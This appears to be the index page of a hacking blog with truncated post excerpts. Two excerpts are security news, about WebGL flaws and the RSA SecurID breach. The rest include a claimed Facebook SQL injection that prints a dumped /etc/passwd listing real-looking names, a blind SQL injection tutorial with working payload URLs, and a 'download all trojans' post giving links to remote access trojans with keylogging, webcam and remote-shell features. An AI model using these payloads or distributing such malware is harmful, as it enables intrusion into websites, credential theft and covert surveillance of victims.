WebGL flaws puts Chrome and Firefox users at serious risk WebGL is a new web standard for browsers which aims to bring 3D graphics to any page on the internet. It has recently been enabled by default in Firefox 4 and Google Chrome, and can be turned on in the latest builds of Safari. Context has an ongoing interest in researching new areas affecting the security landscape, especially when it could have a significant impact on our clients. We found that: A number of serious security issues have been identified with the specification and implementations of WebGL(Graphics Library). These issues can allow an attacker to provide malicious code via a web browser which allows attacks on the GPU and graphics drivers. These attacks on the GPU via WebGL can render the entire machine unusable. Additionally, there are other dangers with WebGL that put users’ data, privacy and security at risk. These issues are inherent to the WebGL specification and would require significant arc...
Posts
RSA hacked,users affected In an open letter, Art Coviello, the executive chairman of RSA (the security division of EMC), made public the fact that the company has suffered a breach and data loss following an "extremely sophisticated cyber attack." Categorizing the attack as an Advanced Persistent Threat - a term that is often associated with corporate espionage and state sponsored attacks - he said that their investigation revealed that the information extracted from the company systems is related to its SecurID two-factor authentication products, which are widely used by government agencies, private companies and other large organizations to add an additional layer of security for when employees log into their companies' networks. "While at this time we are confident that the information extracted does not enable a successful direct attack on any of our RSA SecurID customers, this information could potentially be used to reduce the effe...
Facebook Sql injection Injection Include : root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh user:x:1000:1000:user,,,:/home/user:/bin/bash sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin todd:x:1001:1001:Todd Weaver,,,:/home/todd:/bin/bash jeff:x:1002:1002:Jeff Reifman,,,:/home/jeff:/bin/ba...
Blind SQL Injection tutorial ................................................................................................................................ Let's start with advanced stuff. I will be using our example http://www.site.com/news.php?id=5 when we execute this, we see some page and articles on that page, pictures etc... then when we want to test it for blind sql injection attack http://www.site.com/news.php?id=5 and 1=1 <--- this is always true and the page loads normally, that's ok. now the real test http://www.site.com/news.php?id=5 and 1=2 <--- this is false so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection. 1) Get the MySQL version to get the version in blind attack we use substring i.e http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4 this should return TRUE if the version of MySQL is 4. replace 4 with 5, and if query return TRUE then th...
Download all trojans Spy-Net [RAT] v1.7 Download : http://www.mediafire.com/?5sqm3s5uwfsfllj Nuclear RAT 2.1.0 * Programmed by: Caesar2k * Date added / updated: September 4th 2007 * Downloads : 80685 * File size: 1.26MB * Coded in: Delphi * Section: Remote Administration Tools & Spy * Compatibility: Windows NT, 2K, XP, Vista Download : http://www.nuclearwintercrew.com/Products-View/21/Nuclear_RAT_2.1.0/ Turkojan 4 Features : * Reverse Connection * Remote Desktop(very fast) * Webcam Streaming (very fast) * Audio Streaming * Thumbnail viewer * Remote passwords * MSN Sniffer * Remote Shell * Web-Site Blocking * Chat with server * Send fake messages * Advanced file manager * Zipping files&folders * Find files * Change remote screen resolution * Mouse manager * Information about remote computer * Clipboard manager * IE options * Running Process * Service Manager * Keyboard Manager * Online keylogger * Off...
SQL injection attack The Target Intranet This appeared to be an entirely custom application, and we had no prior knowledge of the application nor access to the source code : this was a "blind" attack. A bit of poking showed that this server ran Microsoft's IIS 6 along with ASP.NET, and this suggested that the database was Microsoft's SQL server: we believe that these techniques can apply to nearly any web application backed by any SQL server. The login page had a traditional username-and-password form, but also an email-me-my-password link; the latter proved to be the downfall of the whole system. When entering an email address, the system presumably looked in the user database for that email address, and mailed something to that address. Since my email address is not found, it wasn't going to send me anything. So the first test in any SQL-ish form is to enter a single quote as part of the data: the intention is to see if they construct an SQL...